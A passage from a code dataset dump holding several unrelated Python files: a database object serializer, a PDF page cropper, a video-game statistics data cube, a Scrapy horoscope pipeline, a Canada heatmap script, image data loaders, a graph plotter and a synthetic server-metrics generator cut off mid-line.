is_active=r.get_bool(\"is_active\"),\n cron=r.get_str(\"cron\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.job_id)\n w.set_bool(\"is_active\", self.is_active)\n w.set_str(\"cron\", self.cron)\n\n\n@dataclass(slots=True)\nclass JobActionConfigItem(DatabaseObject):\n job_id: UUID\n action: str\n name: str\n value: str | None\n\n @classmethod\n def create(cls, job_id: UUID, action: str, name: str, value: str | None):\n return cls(\n id=_factory_uuid(),\n job_id=job_id,\n action=action,\n name=name,\n value=value,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n job_id=r.get_parent_id(),\n action=r.get_str(\"action\"),\n name=r.get_str(\"name\"),\n value=r.get_str_optional(\"value\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.job_id)\n w.set_str(\"action\", self.action)\n w.set_str(\"name\", self.name)\n w.set_str_optional(\"value\", self.value)\n\n\n@dataclass(slots=True)\nclass Task(DatabaseObject):\n job_id: UUID\n is_active: bool\n step: int\n action: str\n\n @classmethod\n def create(cls, job_id: UUID, action: str):\n return cls(\n id=_factory_uuid(),\n job_id=job_id,\n is_active=True,\n step=-1,\n action=action,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n job_id=r.get_parent_id(),\n is_active=r.get_bool(\"is_active\"),\n step=r.get_int(\"step\"),\n action=r.get_str(\"action\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.job_id)\n w.set_bool(\"is_active\", self.is_active)\n w.set_int(\"step\", self.step)\n w.set_str(\"action\", self.action)\n\n\n@dataclass(slots=True)\nclass TaskActionConfigItem(DatabaseObject):\n task_id: UUID\n action: str\n name: str\n value: str | None\n\n @classmethod\n def create(cls, task_id: UUID, action: str, name: str, value: str | None):\n return cls(\n id=_factory_uuid(),\n task_id=task_id,\n action=action,\n name=name,\n value=value,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n task_id=r.get_parent_id(),\n action=r.get_str(\"action\"),\n name=r.get_str(\"name\"),\n value=r.get_str_optional(\"value\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.task_id)\n w.set_str(\"action\", self.action)\n w.set_str(\"name\", self.name)\n w.set_str_optional(\"value\", self.value)\n\n\n@dataclass(slots=True)\nclass TriggerEvent(DatabaseObject):\n job_id: UUID\n triggered_on: datetime\n triggered_by_job_schedule_id: UUID | None\n triggered_by_user_id: UUID | None\n\n @classmethod\n def create(cls, job_id: UUID, triggered_by_job_schedule_id: UUID | None = None, triggered_by_user_id: UUID | None = None):\n if triggered_by_job_schedule_id is None and triggered_by_user_id is None:\n raise ValueError(\"values 'triggered_by_job_schedule_id' and 'triggered_by_user_id' cannot both be None\")\n now = _factory_datetime()\n return cls(\n id=_factory_uuid(),\n job_id=job_id,\n triggered_on=now,\n triggered_by_job_schedule_id=triggered_by_job_schedule_id,\n triggered_by_user_id=triggered_by_user_id,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n o = cls(\n id=r.get_id(),\n job_id=r.get_parent_id(),\n triggered_on=r.get_datetime(\"triggered_on\"),\n triggered_by_job_schedule_id=r.get_uuid_optional(\"triggered_by_job_schedule_id\"),\n triggered_by_user_id=r.get_uuid_optional(\"triggered_by_user_id\"),\n )\n if o.triggered_by_job_schedule_id is None and o.triggered_by_user_id is None:\n raise ValueError(\"values 'triggered_by_job_schedule_id' and 'triggered_by_user_id' cannot both be None\")\n return o\n\n def serialize(self, w: SerializerWriter):\n if self.triggered_by_job_schedule_id is None and self.triggered_by_user_id is None:\n raise ValueError(\"values 'triggered_by_job_schedule_id' and 'triggered_by_user_id' cannot both be None\")\n w.set_id(self.id)\n w.set_parent(self.job_id)\n w.set_datetime(\"triggered_on\", self.triggered_on)\n w.set_uuid_optional(\"triggered_by_job_schedule_id\", self.triggered_by_job_schedule_id)\n w.set_uuid_optional(\"triggered_by_user_id\", self.triggered_by_user_id)\n\n\n@dataclass(slots=True)\nclass CancellationEvent(DatabaseObject):\n execution_id: UUID\n cancelled_on: datetime\n cancelled_by_user_id: UUID\n\n @classmethod\n def create(cls, execution_id: UUID, cancelled_by_user_id: UUID):\n now = _factory_datetime()\n return cls(\n id=_factory_uuid(),\n execution_id=execution_id,\n cancelled_on=now,\n cancelled_by_user_id=cancelled_by_user_id,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n execution_id=r.get_parent_id(),\n cancelled_on=r.get_datetime(\"cancelled_on\"),\n cancelled_by_user_id=r.get_uuid(\"cancelled_by_user_id\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.execution_id)\n w.set_datetime(\"cancelled_on\", self.cancelled_on)\n w.set_uuid(\"cancelled_by_user_id\", self.cancelled_by_user_id)\n\n\nEXECUTION_STATE_TRIGGERED = \"TRIGGERED\".casefold()\nEXECUTION_STATE_QUEUED = \"QUEUED\".casefold()\nEXECUTION_STATE_STARTED = \"STARTED\".casefold()\nEXECUTION_STATE_COMPLETED = \"COMPLETED\".casefold()\nEXECUTION_STATE_CANCELLED = \"CANCELLED\".casefold()\nEXECUTION_STATE_ERROR = \"ERROR\".casefold()\n\n\n@dataclass(slots=True)\nclass Execution(DatabaseObject):\n system_id: UUID\n trigger_event_id: UUID\n state: str\n executing_task_id: UUID | None\n started_on: datetime | None\n completed_on: datetime | None\n cancellation_event_id: UUID | None\n error_serialized: str | None\n job_serialized: str\n execution_server_thread_id: UUID | None = None\n\n @classmethod\n def create(cls, system_id: UUID, trigger_event_id: UUID, job_serialized: str):\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n trigger_event_id=trigger_event_id,\n state=EXECUTION_STATE_TRIGGERED,\n executing_task_id=None,\n started_on=None,\n completed_on=None,\n cancellation_event_id=None,\n error_serialized=None,\n job_serialized=job_serialized,\n execution_server_thread_id=None,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n trigger_event_id=r.get_uuid(\"trigger_event_id\"),\n state=r.get_str(\"state\"),\n executing_task_id=r.get_uuid_optional(\"executing_task_id\"),\n started_on=r.get_datetime_optional(\"started_on\"),\n completed_on=r.get_datetime_optional(\"completed_on\"),\n cancellation_event_id=r.get_uuid_optional(\"cancellation_event_id\"),\n error_serialized=r.get_str_optional(\"error_serialized\"),\n job_serialized=r.get_str_optional(\"job_serialized\"),\n execution_server_thread_id=r.get_uuid_optional(\"execution_server_thread_id\")\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_uuid_optional(\"trigger_event_id\", self.trigger_event_id)\n w.set_str(\"state\", self.state)\n w.set_uuid_optional(\"executing_task_id\", self.executing_task_id)\n w.set_datetime_optional(\"started_on\", self.started_on)\n w.set_datetime_optional(\"completed_on\", self.completed_on)\n w.set_uuid_optional(\"cancellation_event_id\", self.cancellation_event_id)\n w.set_str_optional(\"error_serialized\", self.error_serialized)\n w.set_str_optional(\"job_serialized\", self.job_serialized)\n w.set_uuid_optional(\"execution_server_thread_id\", self.execution_server_thread_id)\n\n\n@dataclass(slots=True)\nclass ExecutionServer(DatabaseObject):\n system_id: UUID\n started_on: datetime\n heartbeat_on: datetime\n\n @classmethod\n def create(cls, system_id: UUID):\n now = _factory_datetime()\n return cls(\n id=_factory_uuid(),\n system_id=system_id,\n started_on=now,\n heartbeat_on=now,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n system_id=r.get_parent_id(),\n started_on=r.get_datetime(\"started_on\"),\n heartbeat_on=r.get_datetime(\"heartbeat_on\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.system_id)\n w.set_datetime(\"started_on\", self.started_on)\n w.set_datetime(\"heartbeat_on\", self.heartbeat_on)\n\n\n@dataclass(slots=True)\nclass ExecutionServerThread(DatabaseObject):\n execution_server_id: UUID\n started_on: datetime\n heartbeat_on: datetime\n execution_id: UUID | None\n\n @classmethod\n def create(cls, execution_server_id: UUID):\n now = _factory_datetime()\n return cls(\n id=_factory_uuid(),\n execution_server_id=execution_server_id,\n started_on=now,\n heartbeat_on=now,\n execution_id=None,\n )\n\n @classmethod\n def deserialize(cls, r: SerializerReader):\n return cls(\n id=r.get_id(),\n execution_server_id=r.get_parent_id(),\n started_on=r.get_datetime(\"started_on\"),\n heartbeat_on=r.get_datetime(\"heartbeat_on\"),\n execution_id=r.get_uuid_optional(\"execution_id\"),\n )\n\n def serialize(self, w: SerializerWriter):\n w.set_id(self.id)\n w.set_parent(self.execution_server_id)\n w.set_datetime(\"started_on\", self.started_on)\n w.set_datetime(\"heartbeat_on\", self.heartbeat_on)\n w.set_uuid_optional(\"execution_id\", self.execution_id)\n\n\ndef _field_names_populate():\n _classes_str2cls.clear()\n _classes_cls2str.clear()\n _field_names_camel2snake.clear()\n _field_names_snake2camel.clear()\n\n def is_dataclass_item(member):\n if member is None: return False\n if not inspect.isclass(member): return False\n if member.__module__ != __name__: return False\n if \"id\" not in dir(member): return False\n\n def contains_dataclass(member_names):\n for member_name in member_names:\n if \"_dataclass_\".casefold() in member_name.casefold():\n return True\n return False\n\n if not contains_dataclass(dir(member)): return False\n return True\n\n for tpl in inspect.getmembers(sys.modules[__name__], is_dataclass_item):\n cls = tpl[1]\n _classes_str2cls[cls.__name__] = cls\n _classes_cls2str[cls] = cls.__name__\n\n for f in dataclasses.fields(cls):\n snake_name = f.name\n camel_name = utils.str2camel(snake_name)\n ds = _field_names_snake2camel.get(cls)\n if ds is None:\n ds = dict()\n _field_names_snake2camel[cls] = ds\n ds[snake_name] = camel_name\n\n dc = _field_names_camel2snake.get(cls)\n if dc is None:\n dc = dict()\n _field_names_camel2snake[cls] = dc\n dc[camel_name] = snake_name\n\n_field_names_populate()\n\n\n\n\ndef main():\n dostuff()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maxrunsoftware/jezel","sub_path":"database_object3.py","file_name":"database_object3.py","file_ext":"py","file_size_in_byte":28600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12598501641","text":"import numpy\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\ndef cropPageLeft(page):\n\twidth = page.mediaBox.lowerRight[0]\n\theight = page.mediaBox.upperLeft[1]\n\t\n\tpage.cropBox.lowerLeft = (0, height/2)\n\tpage.cropBox.lowerRight = (width, height/2)\n\tpage.cropBox.upperLeft = (0, height)\n\tpage.cropBox.upperRight = (width, height)\n\ndef cropPageRight(page):\n\twidth = page.mediaBox.lowerRight[0]\n\theight = page.mediaBox.upperLeft[1]\n\t\n\tpage.cropBox.lowerLeft = (0, 0)\n\tpage.cropBox.lowerRight = (width, 0)\n\tpage.cropBox.upperLeft = (0, height/2)\n\tpage.cropBox.upperRight = (width, height/2)\n\ndef splitPDF(pdf, pagesPerDocument):\n\treader1 = PdfFileReader(pdf)\n\treader2 = PdfFileReader(pdf)\n\tnumPages = reader1.getNumPages()\n\t\n\tif numPages % pagesPerDocument != 0:\n\t\traise Exception(f\"Number of pages not divisible by {pagesPerDocument}.\")\n\t\t\n\tnumDocs = numPages // pagesPerDocument\n\t\n\tpages1 = [reader1.getPage(i) for i in range(numPages)]\n\tpages2 = [reader2.getPage(i) for i in range(numPages)]\n\t\n\tarraysOfPages1 = numpy.array_split(pages1, numDocs)\n\tarraysOfPages2 = numpy.array_split(pages2, numDocs)\n\t\n\twriters = []\n\t\n\tfor i in range(numDocs):\n\t\twriter = PdfFileWriter()\n\t\t\n\t\tfor j in range(pagesPerDocument):\n\t\t\tcropPageLeft(arraysOfPages1[i][j])\n\t\t\tcropPageRight(arraysOfPages2[i][j])\n\t\t\t\n\t\t\tif j % 2 == 0:\n\t\t\t\twriter.insertPage(arraysOfPages1[i][j])\n\t\t\t\twriter.addPage(arraysOfPages2[i][j])\t\n\t\t\tif j % 2 == 1:\n\t\t\t\twriter.addPage(arraysOfPages1[i][j])\n\t\t\t\twriter.insertPage(arraysOfPages2[i][j])\t\n\t\n\t\twriters.append(writer)\n\t\n\treturn writers\n\npagesPerDocument = int(input(\"Enter number of pages per document: \"))\n\t\n\nwith open(\"PDF.pdf\", \"rb\") as input:\n\twriters = splitPDF(input, pagesPerDocument)\n\toutputWriter = PdfFileWriter()\n\t\n\tfor writer in writers:\n\t\tfor page in [writer.getPage(i) for i in range(writer.getNumPages())]:\n\t\t\toutputWriter.addPage(page)\n\t\t\t\n\t\t\n\twith open(\"output.pdf\", \"wb\") as output:\n\t\toutputWriter.write(output)\n\t\t\n\t\t\t\t\t\n","repo_name":"pdavisonreiber/PDFCropper","sub_path":"PDFCropper.py","file_name":"PDFCropper.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"74679239958","text":"import pandas as pd\r\nfrom numpy import sort\r\n\r\nfrom Process import get_number\r\n\r\n\r\nclass DataCube:\r\n def __init__(self, df, categories):\r\n self.df = df\r\n self.categories = categories\r\n self.options = []\r\n self.used_values = []\r\n\r\n def get_val_based_on_condition(self, dataset, option, value):\r\n cond = input('Enter one of these options =, /=, >, >=, <, <=')\r\n if cond == '=':\r\n return dataset.loc[self.df[option] == value]\r\n elif cond == '/=':\r\n return dataset.loc[self.df[option] != value]\r\n elif cond == '>':\r\n return dataset.loc[self.df[option] > value]\r\n elif cond == '>=':\r\n return dataset.loc[self.df[option] >= value]\r\n elif cond == '<':\r\n return dataset.loc[self.df[option] < value]\r\n elif cond == '<=':\r\n return dataset.loc[self.df[option] <= value]\r\n else:\r\n return self.get_val_based_on_condition(dataset, option, value)\r\n\r\n def get_games_on_option(self, dimension):\r\n num = input('Enter the number of values you want to use in your query. You may select multiple values of the '\r\n 'same option.')\r\n\r\n for i in range(get_number(num, int)):\r\n option = dimension.get_option()\r\n self.used_values.append(option)\r\n\r\n sort(self.used_values)\r\n count_vals = {}\r\n for i in self.used_values:\r\n if i not in count_vals:\r\n count_vals.update({i: 1})\r\n else:\r\n count_vals[i] += 1\r\n\r\n data = self.df[self.categories]\r\n for option in count_vals:\r\n datasets = []\r\n for i in range(count_vals[option]):\r\n op = Options(option, self.df)\r\n option_value = op.get_values_for_data()\r\n self.options.append(option_value)\r\n val = self.get_val_based_on_condition(data, option, option_value)\r\n datasets.append(val)\r\n data = pd.concat(datasets)\r\n\r\n dimensions = dimension.get_dimensions()\r\n print(data[dimensions].to_string(index=False))\r\n\r\n\r\nclass Options:\r\n def __init__(self, option, df):\r\n self.option = option\r\n self.df = df\r\n\r\n def get_values_for_data(self):\r\n option_value = input('Enter the value for ' + self.option + ' You would like to view.')\r\n if self.option in ['NA_Sales', 'EU_Sales', 'JP_Sales', 'Other_Sales', 'Global_Sales', 'Critic_Score',\r\n 'Critic_Count', 'User_Score', 'User_Count', 'Year_of_Release']:\r\n option_value = get_number(option_value)\r\n\r\n if type(option_value) != float:\r\n while option_value not in list(self.df[self.option]):\r\n option_value = input('Not a valid option, try again.')\r\n return option_value\r\n\r\n\r\nclass Dimension:\r\n def __init__(self, categories):\r\n self.categories = categories\r\n\r\n def get_dimensions(self):\r\n num = input('How many variables from the dataset would you like to use?')\r\n dimensions = []\r\n for i in range(get_number(num, int)):\r\n dimension = self.get_option('What dimension would you like to view')\r\n if dimension not in dimensions:\r\n dimensions.append(dimension)\r\n else:\r\n print('dimension', dimension, 'already in the list.')\r\n i -= 1\r\n return dimensions\r\n\r\n def get_option(self, value='What option of games would you like to get your data based on?'):\r\n option = input(value)\r\n while option not in self.categories:\r\n option = input('Not a valid option, try again.')\r\n return option\r\n","repo_name":"thatgirlprogrammer/Video_Game_Stats","sub_path":"data_Cube.py","file_name":"data_Cube.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"37149703925","text":"# -*- coding: utf-8 -*-\nfrom scrapy.exceptions import DropItem\n\nsign_table = {\n u'白羊座': '火象',\n u'狮子座': '火象',\n u'射手座': '火象',\n u'水瓶座': '风象',\n u'双子座': '风象',\n u'天秤座': '风象',\n u'金牛座': '土象',\n u'处女座': '土象',\n u'摩羯座': '土象',\n u'巨蟹座': '水象',\n u'天蝎座': '水象',\n u'双鱼座': '水象',\n}\n\n\nclass HoroscopeSignPipeline(object):\n def process_item(self, item, spider):\n if not item['horoscope']:\n raise DropItem('no horoscope')\n elif item['horoscope'] in sign_table:\n item['sign'] = sign_table[item['horoscope']]\n else:\n raise DropItem('invalid horoscope ' + item['horoscope'])\n return item\n","repo_name":"genzj/web-crawler-training-exercise","sub_path":"example/ex2-crawler-engineering/topmusic/topmusic/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"3985837089","text":"\"\"\"This file is responsible for the creation and display of the heatmap for the given factor\"\"\"\nfrom typing import Any\n\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nimport python_ta\n\n\n# Creation of Map\ndef map_creation(indexes: dict, factor: str) -> Any:\n \"\"\"Accepts a dictionary containing the province codes as keys and their factor indexes as the values. The values\n in the dictionary is appended to the geodataframe obtained from a geojson file which contains the data to create the\n map for all provinces in Canada which is then used to create the heatmap.\n \"\"\"\n canada = gpd.GeoDataFrame.from_file(\"georef-canada-province@public.geojson\")\n\n # Order: AB, YT, MB, SK, NT, PE, NS, ON, QC, NU, BC, NL, NB\n # Province Indexes are appended\n for index in indexes:\n if indexes[index] is None:\n indexes[index] = 0\n canada['indexes'] = [indexes['AB'], indexes['YT'], indexes['MB'], indexes['SK'], indexes['NT'], indexes['PE'],\n indexes['NS'], indexes['ON'], indexes['QC'], indexes['NU'], indexes['BC'], indexes['NL'],\n indexes['NB']]\n\n # # # # Complex mapping\n canada.plot(column='indexes', cmap='OrRd',\n legend=True, figsize=(10, 8))\n plt.title(\"Heatmap for \" + factor + \" cost (in CAD)\")\n plt.show()\n\n return canada\n\n\nif __name__ == '__main__':\n python_ta.check_all(config={\n 'max-line-length': 120,\n 'max-nested-blocks': 4,\n 'extra-imports': ['geopandas', 'matplotlib.pyplot', 'graph', 'classes'],\n })\n","repo_name":"raghav034/analysing-cities","sub_path":"analysing-cities/map_creation.py","file_name":"map_creation.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36205895907","text":"import numpy as np\nfrom torchvision import transforms, datasets\nfrom torch.utils.data import DataLoader\nfrom PIL import Image\n\n\ndef transform_image():\n \"\"\"Returns transform object of train/valid/test datasets.\"\"\"\n image_transforms = {\n 'train':\n transforms.Compose([\n # use data augmentation on training sets\n transforms.RandomResizedCrop(224),\n transforms.RandomRotation(degrees=30),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225]) # Imagenet standards\n ]),\n # no augmentation on validation and test sets\n 'valid':\n transforms.Compose([\n transforms.Resize(size=256),\n transforms.CenterCrop(size=224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ]),\n 'test':\n transforms.Compose([\n transforms.Resize(size=256),\n transforms.CenterCrop(size=224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ]),\n }\n return image_transforms\n\n\ndef get_dataloaders(data_dir):\n \"\"\"Return data and dataloader based on data directory\n\n Args: string value that refers file directory\n\n Returns:\n data: train/valid/test datasets dictionary\n dataloaders: train/valid/test dataloader dictionary\n \"\"\"\n train_dir = data_dir + '/train'\n valid_dir = data_dir + '/valid'\n test_dir = data_dir + '/test'\n # Image transformations\n image_transforms = transform_image()\n data = {\n 'train':\n datasets.ImageFolder(root=train_dir,\n transform=image_transforms['train']),\n 'valid':\n datasets.ImageFolder(root=valid_dir,\n transform=image_transforms['valid']),\n 'test':\n datasets.ImageFolder(root=test_dir,\n transform=image_transforms['test']),\n }\n dataloaders = {\n 'train': DataLoader(data['train'], batch_size=32, shuffle=True),\n 'val': DataLoader(data['valid'], batch_size=32),\n 'test': DataLoader(data['test'], batch_size=32)\n }\n return data, dataloaders\n\n\ndef process_image(image):\n \"\"\"Scales, crops, and normalizes a PIL image for a PyTorch model,\n\n returns an Numpy array\n \"\"\"\n img_size = 256\n crop_size = 224\n\n im = Image.open(image)\n im = im.resize((img_size,img_size))\n\n left = (img_size-crop_size)*0.5\n right = left + crop_size\n upper = (img_size-crop_size)*0.5\n lower = upper + crop_size\n\n im = im.crop((left, upper, right, lower))\n im = np.array(im)/255\n\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n im = (im - mean) / std\n return im.transpose(2,0,1)\n","repo_name":"kimcrab/udacity-project","sub_path":"image-classifier-project/python-files/data_processor.py","file_name":"data_processor.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74574435796","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 3 14:01:39 2016\n\n@author: arlittr\n\"\"\"\n\nimport networkx as nx\n\ndef plotPgvGraph(G,filename=None,printRelationships='relationship',promoteNodeLabels='rtype',printOldNodeLabels=False):\n G2 = G.copy()\n \n #print relationships on edges\n if printRelationships:\n for n,nbrs in G2.adjacency_iter():\n for nbr in nbrs.keys():\n for edgeKey,edgeProperties in G2[n][nbr].items():\n G2[n][nbr][edgeKey]['label'] = edgeProperties[printRelationships]\n \n #promote the attribute in promoteNodeLabels to node label\n if promoteNodeLabels:\n for n in G2.nodes_iter():\n try:\n G2.node[n]['label'] = G2.node[n][promoteNodeLabels]\n except:\n G2.node[n]['label'] = None\n \n #draw graph\n thisG = nx.drawing.nx_pydot.to_pydot(G2)\n if filename==None:\n filename = 'plots/'+ 'junk' + '.svg'\n thisG.write(filename,format='svg')\n ","repo_name":"DesignEngrLab/IBFM","sub_path":"ibfm_utility/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"243140483","text":"import numpy as np\n\n# 기본 데이터\nlist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\narr1 = np.array(list)\narr2 = np.array(list)\n\n# 넘파이 기본 제공 연산자 사용\nprint(arr1 + arr2)\n\n# 모든 원소들을 직접 더하는 연산 수행 로직\n\narr3 = []\n\nfor i, j in zip(arr1, arr2):\n arr3.append(i + j)\n\nprint(arr3)","repo_name":"ezidayzi/2022-01-lecture","sub_path":"OpenCV/ch03/14.deep.py","file_name":"14.deep.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"31587733497","text":"import argparse\nimport json\nimport random\nimport signal\nimport string\nimport sys\nimport time\nfrom collections import namedtuple\nimport distutils\n\nimport boto3\nimport numpy as np\n\nregions = {\n 'us_east_1': dict(cells_per_region=15, silos_per_cell=3),\n 'us-east-2': dict(cells_per_region=2, silos_per_cell=2),\n 'us-west-1': dict(cells_per_region=6, silos_per_cell=2),\n 'us-west-2': dict(cells_per_region=2, silos_per_cell=2),\n 'eu-west-1': dict(cells_per_region=10, silos_per_cell=2),\n 'ap-northeast-1': dict(cells_per_region=5, silos_per_cell=3),\n}\n\nmicroserviceApollo = 'apollo'\nmicroserviceAthena = 'athena'\nmicroserviceDemeter = 'demeter'\nmicroserviceHercules = 'hercules'\nmicroserviceZeus = 'zeus'\nmicroservices = [microserviceApollo, microserviceAthena, microserviceDemeter, microserviceHercules, microserviceZeus]\n\ninstance_r5_4xl = 'r5.4xlarge'\ninstance_m5_8xl = 'm5.8xlarge'\ninstance_c5_16xl = 'c5.16xlarge'\ninstance_m5_4xl = 'm5.4xlarge'\n\ninstanceTypes = {\n microserviceApollo: instance_r5_4xl,\n microserviceAthena: instance_m5_8xl,\n microserviceDemeter: instance_c5_16xl,\n microserviceHercules: instance_r5_4xl,\n microserviceZeus: instance_m5_4xl\n}\n\nosAl2 = 'AL2'\nosAl2012 = 'AL2012'\n\nosVersions = {\n microserviceApollo: osAl2,\n microserviceAthena: osAl2012,\n microserviceDemeter: osAl2012,\n microserviceHercules: osAl2012,\n microserviceZeus: osAl2\n}\n\ninstancesForMicroservice = {\n microserviceApollo: 3,\n microserviceAthena: 1,\n microserviceDemeter: 1,\n microserviceHercules: 2,\n microserviceZeus: 3\n}\n\nprocessHostmanager = 'host_manager'\nprocessServer = 'server'\n\nprocessNames = {\n microserviceApollo: [processServer],\n microserviceAthena: [processServer, processHostmanager],\n microserviceDemeter: [processServer, processHostmanager],\n microserviceHercules: [processServer],\n microserviceZeus: [processServer]\n}\n\njdk8 = 'JDK_8'\njdk11 = 'JDK_11'\n\njdkVersions = {\n microserviceApollo: jdk11,\n microserviceAthena: jdk8,\n microserviceDemeter: jdk8,\n microserviceHercules: jdk8,\n microserviceZeus: jdk11\n}\n\nmeasureCpuUser = 'cpu_user'\nmeasureCpuSystem = 'cpu_system'\nmeasureCpuIdle = 'cpu_idle'\nmeasureCpuIowait = 'cpu_iowait'\nmeasureCpuSteal = 'cpu_steal'\nmeasureCpuNice = 'cpu_nice'\nmeasureCpuSi = 'cpu_si'\nmeasureCpuHi = 'cpu_hi'\nmeasureMemoryFree = 'memory_free'\nmeasureMemoryUsed = 'memory_used'\nmeasureMemoryCached = 'memory_cached'\nmeasureDiskIoReads = 'disk_io_reads'\nmeausreDiskIoWrites = 'disk_io_writes'\nmeasureLatencyPerRead = 'latency_per_read'\nmeasureLatencyPerWrite = 'latency_per_write'\nmeasureNetworkBytesIn = 'network_bytes_in'\nmeasureNetworkBytesOut = 'network_bytes_out'\nmeasureDiskUsed = 'disk_used'\nmeasureDiskFree = 'disk_free'\nmeasureFileDescriptors = 'file_descriptors_in_use'\n\nmeasureTaskCompleted = 'task_completed'\nmeasureTaskEndState = 'task_end_state'\nmeasureGcReclaimed = 'gc_reclaimed'\nmeasureGcPause = 'gc_pause'\n\nmeasuresForMetrics = [measureCpuUser, measureCpuSystem, measureCpuIdle, measureCpuIowait,\n measureCpuSteal, measureCpuNice, measureCpuSi, measureCpuHi,\n measureMemoryFree, measureMemoryUsed, measureMemoryCached, measureDiskIoReads,\n meausreDiskIoWrites, measureLatencyPerRead, measureLatencyPerWrite, measureNetworkBytesIn,\n measureNetworkBytesOut, measureDiskUsed, measureDiskFree, measureFileDescriptors]\n\nmeasuresForEvents = [measureTaskCompleted, measureTaskEndState, measureGcReclaimed, measureGcPause, measureMemoryFree]\n\nmeasureValuesForTaskEndState = ['SUCCESS_WITH_NO_RESULT', 'SUCCESS_WITH_RESULT', 'INTERNAL_ERROR', 'USER_ERROR',\n 'UNKNOWN', 'THROTTLED']\nselectionProbabilities = [0.2, 0.7, 0.01, 0.07, 0.01, 0.01]\n\nDimensionsMetric = namedtuple('DimensionsMetric',\n 'region cell silo availability_zone microservice_name instance_type os_version instance_name')\nDimensionsEvent = namedtuple('DimensionsEvent',\n 'region cell silo availability_zone microservice_name instance_name process_name, jdk_version')\n\n\nutilizationRand = random.Random(12345)\nlowUtilizationHosts = []\nhighUtilizationHosts = []\n\nclass MeasureValue:\n def __init__(self, name, value, type):\n self.name = name\n if type == 'DOUBLE':\n self.value = round(value, 2)\n else:\n self.value = value\n self.type = type\n\n\ndef generateRandomAlphaNumericString(length=5):\n rand = random.Random(12345)\n x = ''.join(rand.choices(string.ascii_letters + string.digits, k=length))\n print(x)\n return x\n\n\ndef generateDimensions(scaleFactor):\n instancePrefix = generateRandomAlphaNumericString(8)\n dimensionsMetrics = list()\n dimenstionsEvents = list()\n\n for region_name, region_data in regions.items():\n cellsForRegion = region_data['cells_per_region']\n siloForRegion = region_data['silos_per_cell']\n for cell in range(1, cellsForRegion + 1):\n for silo in range(1, siloForRegion + 1):\n for microservice in microservices:\n cellName = '{}-cell-{}'.format(region_name, cell)\n siloName = '{}-cell-{}-silo-{}'.format(region_name, cell, silo)\n numInstances = scaleFactor * instancesForMicroservice[microservice]\n for instance in range(numInstances):\n az = '{}-{}'.format(region_name, (instance % 3) + 1)\n instanceName = 'i-{}-{}-{:04}.amazonaws.com'.format(instancePrefix, microservice, instance)\n instanceType = instanceTypes[microservice]\n osVersion = osVersions[microservice]\n metric = DimensionsMetric(region_name, cellName, siloName, az, microservice, instanceType, osVersion,\n instanceName)\n dimensionsMetrics.append(metric)\n\n jdkVersion = jdkVersions[microservice]\n for process in processNames[microservice]:\n event = DimensionsEvent(region_name, cellName, siloName, az, microservice, instanceName, process,\n jdkVersion)\n dimenstionsEvents.append(event)\n\n return (dimensionsMetrics, dimenstionsEvents)\n\ndef createRandomMetrics(host_id, timestamp, time_unit, dimensions):\n measure_values = list()\n\n ## CPU measures\n if host_id in highUtilizationHosts:\n cpu_user = 85.0 + 10.0 * random.random()\n elif host_id in lowUtilizationHosts:\n cpu_user = 10.0 * random.random()\n else:\n cpu_user = 35.0 + 30.0 * random.random()\n\n measure_values.append(MeasureValue(measureCpuUser, cpu_user, 'DOUBLE'))\n\n otherCpuMeasures = [measureCpuSystem, measureCpuSteal, measureCpuIowait, measureCpuNice, 